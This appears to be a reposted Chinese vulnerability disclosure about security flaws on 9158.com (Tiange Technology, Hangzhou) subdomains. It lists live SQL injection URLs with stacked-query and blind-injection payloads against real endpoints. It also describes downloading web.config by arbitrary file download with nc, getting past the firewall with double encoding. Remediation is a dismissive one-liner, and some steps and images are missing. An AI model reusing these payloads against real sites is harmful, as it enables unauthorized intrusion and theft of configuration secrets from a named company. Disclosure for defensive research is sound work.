好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

9158天格科技(杭州)的一些安全问题 - 网站安全

9158天格科技(杭州)的一些安全问题,多处SQL注射,任意文件 下载 与防火墙绕过。

详细说明:

http://ok.9158.com/musiclist. asp x?musictype=1&searchType=1',1,1--&searchKey=

 

http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1',1,1;select--&searchKey=

 

http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1&searchKey=%E5%AD%99%E4%BF%AA'

http://ok.9158.com/musiclist.aspx?musictype=1&searchType=1&searchKey=%E5%AD%99%E4%BF%AA%27,1,1,1--

注入同上,直接多句执行

 

 

3、盲注

http://room.9158.com/ktv_new/in_ktvroom.aspx?serverid=66&userid=wangjing01' and 1=1 and ''='

 

这个盲注可以自己判断,输入正确的语句和错误的语句。。

 

 

4、同分站任意文件下载

Host: cssr.9158.com

Connection: keep-alive

Cookie: Cache=vod

 

使用 NC 提交

看下图(虽然有防火墙,但可以二次编码绕过)

如:

~/web.config

二次编码后:

 

 

 

 

 

 

修复方案:

应该懂得!

查看更多关于9158天格科技(杭州)的一些安全问题 - 网站安全的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13475
  阅读:39次

上一篇: EMLOG后台COOKIE欺骗(鸡肋) - 网站安全 - 自学php

下一篇:华为某系统文件包含漏洞 - 网站安全 - 自学php

相关资讯